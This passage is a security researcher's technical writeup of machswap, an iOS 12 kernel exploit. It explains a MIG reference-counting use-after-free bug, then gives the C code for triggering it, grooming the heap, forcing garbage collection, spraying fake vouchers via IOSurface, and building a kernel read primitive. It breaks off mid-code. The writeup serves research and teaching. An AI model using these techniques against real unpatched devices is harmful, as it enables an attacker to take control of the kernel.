MachSwap: an iOS 12 Kernel Exploit
Back at the end of January I demo’d an early iOS 12 prototype jailbreak, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the initial non-SMAP exploit under the name machswap (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others who are interested in iOS security research.
Looking at a modern iOS exploit
On the 23rd of January 2019, security researcher @S0rryMybad released a proof of concept exploit for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with a Chinese blog post describing the bug and possible exploitation techniques, and later an English version.
The bug is a use-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue caused by a poorly implemented function within the kernel.
Before explaining the details of the bug, it’s important to understand a little about MIG, and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, and other Apple platforms).
0x01 Mach, MIG, and UAF’s
Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one-another. This includes the kernel, as well as other system services and daemons which are responsible for handling specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”; for example, you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, which in XNU is known as a “handle”.
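To make the postbox analogy concrete, here is a minimal standalone sketch (not taken from machswap) in which a process allocates a port, gives itself a send right, mails itself a message, and receives it back:
#include <mach/mach.h>
#include <stdio.h>
#include <string.h>
int main(void)
{
    /* allocate a "postbox": a port for which we hold the receive right */
    mach_port_t port = MACH_PORT_NULL;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    /* give ourselves a send right so we can post mail to it */
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    /* a simple message: header plus a small inline body */
    struct {
        mach_msg_header_t hdr;
        char body[32];
    } msg = {0};
    msg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    msg.hdr.msgh_remote_port = port;    /* the destination "handle" */
    msg.hdr.msgh_size = sizeof(msg);
    strcpy(msg.body, "hello, mach");
    /* send the letter... */
    mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof(msg), 0, MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    /* ...and collect it from the same postbox (note the extra space for the trailer) */
    struct {
        mach_msg_header_t hdr;
        char body[32];
        mach_msg_trailer_t trailer;
    } rcv = {0};
    mach_msg(&rcv.hdr, MACH_RCV_MSG, 0, sizeof(rcv), port,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    printf("received: %s\n", rcv.body);
    return 0;
}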
While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.
Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:
// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs
subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;
WaitTime 2500;
#include <mach/std_types.defs>
#include <mach/mach_types.defs>
routine call(server_port : mach_port_t;
in command : uint8_t;
in pid : uint32_t);
This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed from any clients that wish to communicate with it. Here, three arguments are provided to the server: the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.
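On the client side, the MIG-generated stub is just an ordinary C function. A caller might use it roughly like this (a sketch; the helper and the command value are hypothetical, and obtaining jailbreakd’s service port is left out):
#include <mach/mach.h>
#include <unistd.h>
/* client-side stub generated by MIG from the routine definition above */
extern kern_return_t jbd_call(mach_port_t server_port, uint8_t command, uint32_t pid);
/* hypothetical helper: ask jailbreakd to run a command against our own process,
   given a send right to its service port (however that was obtained) */
static int ask_jailbreakd(mach_port_t jbd_port, uint8_t command)
{
    kern_return_t ret = jbd_call(jbd_port, command, (uint32_t)getpid());
    return (ret == KERN_SUCCESS) ? 0 : -1;
}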
MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.
But is this always the case? A bug which allows an attacker to decrement the reference count more than intended often means the object can be released while it’s still being used by code, leading to a use-after-free (UAF) condition. This is often referred to as “dropping a ref”. “Releasing” in this case means the memory which the object is held in is given back to the allocator (the mechanism which manages memory allocations – “malloc” in userland, often “kalloc” in the kernel) – this is also known as “freeing” the memory (hence the term use-after-free). The memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then re-used by function “B”, this has the potential to interfere with the workings of function “A”. It’s important to note that the object or memory allocation which has been UAF’d doesn’t have to be continuously used by a single function; the important thing is that the code using the released object still views it as “valid” and thinks it has exclusive use of it, even though, as far as the allocator is concerned, that memory has been released and may have been allocated elsewhere.
From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the actual size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.
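To illustrate “dropping a ref” in isolation, here is a contrived userland sketch (nothing to do with XNU’s actual allocator) of an over-release leading to a use-after-free:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
    int refs;
    char data[32];
} object_t;
static object_t *object_retain(object_t *o) { o->refs++; return o; }
static void object_release(object_t *o)
{
    if (--o->refs == 0)
        free(o);                /* memory handed back to the allocator */
}
int main(void)
{
    object_t *o = calloc(1, sizeof(*o));
    o->refs = 1;
    strcpy(o->data, "important state");
    object_retain(o);           /* refs = 2: a second user now relies on this object */
    /* a buggy code path releases one time too many... */
    object_release(o);          /* refs = 1 */
    object_release(o);          /* refs = 0, object freed */
    /* ...but the first user still believes its reference is valid */
    printf("%s\n", o->data);    /* use-after-free: reads memory that may have been reused */
    return 0;
}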
0x02 The Vuln
This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:
kern_return_t
task_swap_mach_voucher(
task_t task,
ipc_voucher_t new_voucher,
ipc_voucher_t *in_out_old_voucher)
{
if (TASK_NULL == task)
return KERN_INVALID_TASK;
*in_out_old_voucher = new_voucher;
return KERN_SUCCESS;
}
Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:
task = convert_port_to_task(In0P->Head.msgh_request_port);
/* increments by one */
new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
/* increments by one */
old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
ipc_voucher_release(new_voucher); /* decrements by one */
task_deallocate(task);
if (RetCode != KERN_SUCCESS) {
MIG_RETURN_ERROR(OutP, RetCode);
}
if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
/* decrements by one */
OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command mig -DKERNEL -DKERNEL_SERVER mig.defs
At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because of the MIG code having no understanding of what the kernel code (task_swap_mach_voucher) itself is doing, and vice-versa, this leads to an issue. After task_swap_mach_voucher is called, old_voucher and new_voucher will be equal (remember, task_swap_mach_voucher assigns new_voucher into old_voucher). Therefore, the refcount on new_voucher will be incremented once, and then decremented twice, by both ipc_voucher_release and convert_voucher_to_port (again, old_voucher is now equal to new_voucher). The refcount on old_voucher itself will also not be decremented at all. This leads us to the following proof of concept (PoC):
mach_voucher_attr_recipe_data_t atm_data =
{
.key = MACH_VOUCHER_ATTR_KEY_ATM,
.command = 510
};
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
mach_port_t p2;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);
mach_port_t p3;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);
/*
We assign p1 (our target voucher) onto our thread so it can be retrieved again later
via thread_get_mach_voucher.
This will increment a ref on the voucher -- the current refcount is 2
*/
ret = thread_set_mach_voucher(mach_thread_self(), p1);
ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1
ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)
/* Ask for a handle on the dangling voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
Here we trigger the bug twice via the task_swap_mach_voucher call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.
0x03 Beginning our Exploitation
Once the voucher has been free’d we can then replace it with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (the region of memory in which allocations managed by the allocator are created and destroyed) in order to overwrite the now-free’d voucher with our own data. If this is done successfully, we would then have the voucher pointer on our thread pointing to our arbitrary voucher struct, and we could use the thread_get_mach_voucher function to get a userland handle on that voucher, which can then be passed to Mach APIs to gain new attack primitives.
The ipc_voucher struct is defined as follows:
struct ipc_voucher {
iv_index_t iv_hash; /* checksum hash */
iv_index_t iv_sum; /* checksum of values */
os_refcnt_t iv_refs; /* reference count */
iv_index_t iv_table_size; /* size of the voucher table */
iv_index_t iv_inline_table[IV_ENTRIES_INLINE];
iv_entry_t iv_table; /* table of voucher attr entries */
ipc_port_t iv_port; /* port representing the voucher */
queue_chain_t iv_hash_link; /* link on hash chain */
};
We can see the iv_refs field which contains the reference count which we dropped, and importantly, a pointer to an ipc_port_t in iv_port. This ipc_port_t struct is the kernel representation of a generic Mach port. In this case, the ipc_voucher implements the ipc_port_t as a field whilst implementing some of its own attributes (for example, iv_table and iv_inline_table).
One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.
When we perform our heap spray we want to spray these ipc_voucher structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the iv_port field, and point that into an attacker controlled ipc_port. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled ipc_port which is “theoretically” owned and managed by the kernel.
This is where the “non-SMAP” element of this exploit comes into play. Typically, on SMAP devices (A10 and newer), the kernel is unable to access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers providing userland allocations when attacking the kernel which can directly be modified in userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older firmwares via updates).
In this case, we can spray an ipc_voucher struct, where the iv_port field contains a pointer to an ipc_port allocated in userland. This means the kernel will use our ipc_port as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:
kport_t *fakeport = malloc(0x4000);
mlock((void *)fakeport, 0x4000);
bzero((void *)fakeport, 0x4000);
fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
fakeport->ip_messages.port.receiver_name = 1;
fakeport->ip_messages.port.msgcount = 0;
fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
fakeport->ip_srights = 99;
LOG("fakeport: 0x%llx", (uint64_t)fakeport);
/* the fake voucher to be sprayed */
fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
{
.iv_hash = 0x11111111,
.iv_sum = 0x22222222,
.iv_refs = 100,
.iv_port = (uint64_t)fakeport
};
You can see we create a fake ipc_voucher which contains 100 refs (this is so the object will never prematurely be destroyed), and the iv_port field contains a pointer directly to our userland fakeport object.
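For reference, the fake_ipc_voucher_t type used above is just a userland mirror of the kernel ipc_voucher layout shown earlier, with kernel pointers widened to uint64_t. A sketch of how it might be declared; note that the inline table length (IV_ENTRIES_INLINE), and therefore the exact offset of iv_port, is an assumption that has to match the target kernel:
/* userland mirror of struct ipc_voucher (a sketch; verify sizes/offsets against the target XNU version) */
typedef struct {
    uint32_t iv_hash;
    uint32_t iv_sum;
    uint32_t iv_refs;
    uint32_t iv_table_size;
    uint32_t iv_inline_table[6];    /* assumed value of IV_ENTRIES_INLINE */
    uint64_t iv_table;
    uint64_t iv_port;               /* -> our userland fakeport */
    uint64_t iv_hash_link_next;     /* queue_chain_t expanded into two pointers */
    uint64_t iv_hash_link_prev;
} fake_ipc_voucher_t;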
Now we need to spray this object into kernel memory. However; there is a slight problem, and that is related to the “kalloc” allocator and “kalloc zones”.
0x04 Borachio and the Climate Control Team (Abusing GC)
Kalloc, the XNU allocator which is used to allocate our ipc_voucher struct which we have UAF’d, uses a series of “zones” to allocate objects into. These are sections of heap memory which only contain a specific size or type of object. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (however >16 bytes, as this is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:
$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
elem cur max cur max cur alloc alloc
zone name size size size #elts #elts inuse size count
-------------------------------------------------------------------------------------------------------------
kalloc.16 16 12592K 13301K 805888 851264 802478 4K 256 C
kalloc.32 32 3652K 3941K 116864 126113 113244 4K 128 C
kalloc.48 48 5952K 8867K 126976 189169 121315 4K 85 C
kalloc.64 64 9212K 13301K 147392 212816 145701 4K 64 C
kalloc.80 80 2988K 3941K 38246 50445 37847 4K 51 C
kalloc.96 96 1496K 1556K 15957 16607 15011 8K 85 C
kalloc.128 128 5400K 5911K 43200 47292 41427 4K 32 C
kalloc.160 160 1432K 1556K 9164 9964 7958 8K 51 C
kalloc.192 192 876K 1037K 4672 5535 4520 12K 64 C
kalloc.224 224 9488K 10509K 43373 48043 36239 16K 73 C
kalloc.256 256 2912K 3941K 11648 15764 10799 4K 16 C
kalloc.288 288 3260K 3892K 11591 13839 10416 20K 71 C
kalloc.368 368 3488K 4151K 9705 11553 8810 32K 89 C
kalloc.400 400 2640K 3892K 6758 9964 5665 20K 51 C
kalloc.512 512 3636K 3941K 7272 7882 6848 4K 8 C
kalloc.576 576 212K 345K 376 615 290 4K 7 C
kalloc.768 768 2676K 3503K 3568 4670 3009 12K 16 C
kalloc.1024 1024 3716K 5911K 3716 5911 3503 4K 4 C
kalloc.1152 1152 320K 461K 284 410 200 8K 7 C
kalloc.1280 1280 1040K 1153K 832 922 723 20K 16 C
kalloc.1664 1664 700K 717K 430 441 399 28K 17 C
kalloc.2048 2048 932K 1167K 466 583 456 4K 2 C
kalloc.4096 4096 4816K 13301K 1204 3325 1140 4K 1 C
kalloc.6144 6144 16704K 26602K 2784 4433 2628 12K 2 C
kalloc.8192 8192 1536K 5254K 192 656 187 8K 1 C
ipc.ports 168 5580K 18660K 34011 113737 33156 12K 73 C
The appended awk command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’.
Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.
In this list we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’. This is the zone into which ipc ports are allocated – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray over our free’d voucher we first need to release its page from the ipc.ports zone back to the allocator, and then have it re-allocated into a kalloc zone (which can be sprayed into). This can be done via the GC (Garbage Collection) mechanism. Triggering GC will release any unused pages back to the allocator.
On iOS 10 and older, this mechanism could be triggered via a Mach call to the kernel. However, in iOS 11 this functionality was removed, so attackers must now trigger GC indirectly themselves. In Siguza’s v0rtex writeup, he described one method of doing so:
[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike
Hence the following function. Here we allocate a message which will be placed into the kalloc.16384 zone, and send it (via the send_kalloc_message function) up to 256 times, recording the amount of time each send takes. If a single send takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.
void trigger_gc_please()
{
[...]
uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
uint8_t *body = malloc(body_size);
memset(body, 0x41, body_size);
for (int i = 0; i < gc_ports_cnt; i++)
{
uint64_t t0, t1;
t0 = mach_absolute_time();
gc_ports[i] = send_kalloc_message(body, body_size);
t1 = mach_absolute_time();
if (t1 - t0 > 1000000)
{
LOG("got gc at %d -- breaking", i);
gc_ports_max = i;
break;
}
}
[...]
sched_yield();
sleep(1);
}
Whilst machswap is a particularly fast exploit, this is the slowest part – and an important one. If triggering GC fails, the page will not be released and our heap spray will fail, causing the entire exploit to fail. Since GC works asynchronously (at the same time as other code), we need to wait some time to ensure it has completed – hence the inclusion of the sched_yield and sleep calls in the epilogue of this function.
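The send_kalloc_message helper isn’t shown above; the general idea (borrowed from earlier public exploits such as async_wake) is that a Mach message sent to a port is copied into an ipc_kmsg buffer which the kernel allocates with kalloc, and that buffer stays allocated for as long as the message sits unreceived in the port’s queue. A sketch of such a helper follows (the signature and details are assumptions, and machswap’s actual implementation may differ):
#include <mach/mach.h>
#include <stdlib.h>
#include <string.h>
static mach_port_t send_kalloc_message(uint8_t *body, uint32_t body_size)
{
    /* a port we never receive on, so the queued kmsg (and its kalloc buffer) stays alive */
    mach_port_t port = MACH_PORT_NULL;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    /* raise the queue limit so many messages can be parked on one port */
    mach_port_limits_t limits = { .mpl_qlimit = MACH_PORT_QLIMIT_LARGE };
    mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO,
                             (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
    /* simple (non-complex) message: header followed by our raw body */
    mach_msg_size_t msg_size = (mach_msg_size_t)(sizeof(mach_msg_header_t) + body_size);
    mach_msg_header_t *msg = calloc(1, msg_size);
    msg->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->msgh_remote_port = port;
    msg->msgh_size = msg_size;
    memcpy((uint8_t *)(msg + 1), body, body_size);
    /* the kernel copies this into a kalloc'ed ipc_kmsg and leaves it queued */
    mach_msg(msg, MACH_SEND_MSG, msg_size, 0, MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    free(msg);
    return port;
}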
An important factor of GC that must be taken into consideration is that all objects on a given page must be released before the page itself can be released. This means there cannot be a single other allocation left on the same page as our target UAF voucher. To combat this, 0x2000 vouchers are allocated before our target “p1”, and a further 0x1000 after. See the following code:
/* allocate 0x2000 vouchers to alloc some new fresh pages */
for (int i = 0; i < 0x2000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
}
/* alloc our target uaf voucher */
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
/* allocate 0x1000 more vouchers */
for (int i = 0; i < 0x1000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
}
/*
theoretically, we should now have 3 blocks of memory (roughly) as so:
|--------------------|-------------|------------------|
| ipc ports | target port | more ipc ports |
|--------------------|-------------|------------------|
^ ^
page with only our controlled ports
hopefully our target port is now allocated on a page which contains only our
controlled ports. this means when we release all of our ports *all* allocations
on the given page will be released, and when we trigger GC the page will be released
back from the ipc_ports zone to be re-used by kalloc
this allows us to spray our fake vouchers via IOSurface in other kalloc zones
(ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
of our allocations
*/
After triggering the UAF bug and releasing the target voucher, we can then release all of our controlled vouchers and move on to attempting to trigger GC.
0x05 A Heap Spray for your Sprog
Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray in order to send our fake voucher into the kernel and replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handling drivers and extensions, and a user client is an object which allows a user to issue commands to a kernel extension.
IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as arrays (OSArray), dictionaries (OSDictionary), strings (OSString), etc. Within these objects we can place completely arbitrary data (including nested types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, and it is not blocked by the sandbox.
To spray our data, we create a single surface, and then use an array containing a single dictionary, where each entry contains one of the OSStrings we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4k devices the pagesize is 0x1000 (4,096) bytes, and on 16k devices it is 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code below sets up the data which will be set onto the surface (and hence sprayed into kernel memory), with the bcopy loop then filling each of our OSStrings with our fake ipc_vouchers.
#define FILL_MEMSIZE 0x4000000
int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
bzero((void *)spray_data, spray_size);
uint32_t *spray_cur = spray_data;
/*
+-> Surface
+-> Array
+-> Dictionary
+-> OSString
+-> OSString
+-> OSString
etc (spray_qty times)...
*/
*(spray_cur++) = surface->id;
*(spray_cur++) = 0x0;
*(spray_cur++) = kOSSerializeMagic;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;
for (int i = 0; i < spray_qty; i++)
{
*(spray_cur++) = kOSSerializeSymbol | 5;
*(spray_cur++) = transpose(i);
*(spray_cur++) = 0x0;
*(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize;
ptr + sizeof(fake_ipc_voucher_t) <= end;
ptr += sizeof(fake_ipc_voucher_t))
{
bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
}
spray_cur += (pagesize / sizeof(uint32_t));
}
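For reference, the kOSSerialize* constants used above describe XNU’s binary serialization format (see libkern’s OSSerializeBinary code). Exploit projects commonly redefine them along the following lines (values worth double-checking against the XNU sources for the target version):
#define kOSSerializeMagic          0x000000d3U  /* binary serialization signature */
#define kOSSerializeDictionary     0x01000000U
#define kOSSerializeArray          0x02000000U
#define kOSSerializeSet            0x03000000U
#define kOSSerializeNumber         0x04000000U
#define kOSSerializeSymbol         0x08000000U
#define kOSSerializeString         0x09000000U
#define kOSSerializeData           0x0a000000U
#define kOSSerializeBoolean        0x0b000000U
#define kOSSerializeObject         0x0c000000U
#define kOSSerializeEndCollection  0x80000000U  /* ORed onto the final element of a collection */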
We can then make a call to the userclient to set the provided data onto the Surface:
uint32_t dummy = 0;
size = sizeof(dummy);
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
if(ret != KERN_SUCCESS)
{
LOG("setValue(prep): %s", mach_error_string(ret));
goto out;
}
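For completeness: the client handle used in the setValue call above refers to an IOSurfaceRootUserClient. Opening one looks roughly like the following sketch (the IOKit headers are not part of the public iOS SDK, so exploit projects usually bundle their own copies; creating the surface itself is then done through one of the client’s external methods, whose selector and argument layout are omitted here):
#include <IOKit/IOKitLib.h>
io_connect_t open_iosurface_client(void)
{
    /* find the IOSurfaceRoot service... */
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("IOSurfaceRoot"));
    if (service == IO_OBJECT_NULL)
        return IO_OBJECT_NULL;
    /* ...and open a user client connection to it (type 0 yields an IOSurfaceRootUserClient) */
    io_connect_t client = IO_OBJECT_NULL;
    kern_return_t ret = IOServiceOpen(service, mach_task_self(), 0, &client);
    IOObjectRelease(service);
    return (ret == KERN_SUCCESS) ? client : IO_OBJECT_NULL;
}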
If this has worked correctly, our free’d ipc_voucher will have now been replaced with our fake voucher which we have copied into kernel memory via our heap spray. This means the port stashed on our thread will now point to our fake ipc_voucher, which points to our fake ipc_port, which is allocated in userland as fakeport. We now attempt to get a handle onto this voucher/port, via the thread_get_mach_voucher call:
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
/* fingers crossed we get a userland handle onto our 'fakeport' object */
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
LOG("port: %x", real_port_to_fake_voucher);
/* things are looking good; should be 100% success rate from here */
LOG("WE REALLY POSTED UP ON THIS BLOCK");
mach_port_t the_one = real_port_to_fake_voucher;
From here, things are looking good. Assuming our port is in fact valid, we should have a 100% success rate from this point – the dangerous parts are now over.
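A quick sanity check at this point might look something like the following (machswap’s actual error handling may differ; the cleanup label is hypothetical):
/* if the spray missed, we won't get a usable handle back */
if (!MACH_PORT_VALID(the_one))
{
    LOG("failed to get a handle onto the fake voucher port :(");
    goto out;   /* hypothetical cleanup path */
}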
0x06 Eavesdropping Kernel Memory: Building a Read Primitive
We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.
Typically, I would recommend setting up a read primitive via the mach_port_get_attributes Mach call, as demonstrated in the v0rtex exploit, since that call implements proper locking on the port. However, due to the aforementioned lack of a receive right, this is not possible. Instead, we will use an older but more common technique with regard to Mach-based exploitation: the pid_for_task primitive. The Mach API implements a function called “pid_for_task”, which will return the PID of the process whose task port you provide. Here is the (heavily stripped) kernel code:
kern_return_t
pid_for_task(
struct pid_for_task_args *args)
{
mach_port_name_t t = args->t;
user_addr_t pid_addr = args->pid;
[...]
t1 = port_name_to_task_inspect(t);
[...]
p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
if (p) {
pid = proc_pid(p); /* Returns p->p_pid */
err = KERN_SUCCESS;
} [...]
(void) copyout((char *) &pid, pid_addr, sizeof(int));
return(err);
}
You can see get_bsdtask_info is called on the task port we provide, and then the resulting pid from proc_pid is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from get_bsdtask_info (even so, such checks would be futile against this primitive). Let’s look at get_bsdtask_info and proc_pid:
void *get_bsdtask_info(task_t t)
{
/* ldr x0, [x0, #0x358]; ret */
return(t->bsd_info);
}
int
proc_pid(proc_t p)
{
if (p != NULL)
/* ldr w0, [x0, #0x60]; ret */
return (p->p_pid);
return -1;
}
In essence, via this call, we can retrieve the value of task->bsd_info->p_pid. Since we have control over the task struct (this is a field within our fakeport), we have full control of the address which bsd_info points to. Therefore, by manipulating the bsd_info pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can use two adjacent 32-bit reads and later combine the values to calculate the original value.
We first allocate a fake task object which resides in the ip_kobject field of our fakeport. We also set the ip_bits field of our fakeport to IO_BITS_ACTIVE | IKOT_TASK – this marks our ipc_port as a port which represents a task, allowing us to use calls such as pid_for_task on it.
ktask_t *fake_task = (ktask_t *)malloc(0x600); // task is about 0x568 or some shit
bzero((void *)fake_task, 0x600);
fake_task->ref_count = 0xff;
uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
fakeport->ip_kobject = (uint64_t)fake_task;
The read_addr_ptr variable points to the bsd_info field of our fake task, which we can overwrite with arbitrary kernel addresses. We then implement our 32-bit read primitive like so:
#define rk32(addr, value)\
*read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
value = 0x0;\
ret = pid_for_task(the_one, (int *)&value);
Note the addr - offsets->struct_offsets.proc_pid. This is because when the p_pid field is accessed within the bsd_info struct, it will add the offset of struct_offsets.proc_pid to the bsd_info pointer before performing the read. We therefore subtract this value to account for this and read the correct data.
As previously noted, we can combine two adjacent 32-bit values for a full 64-bit read:
#define rk64(addr, value)\
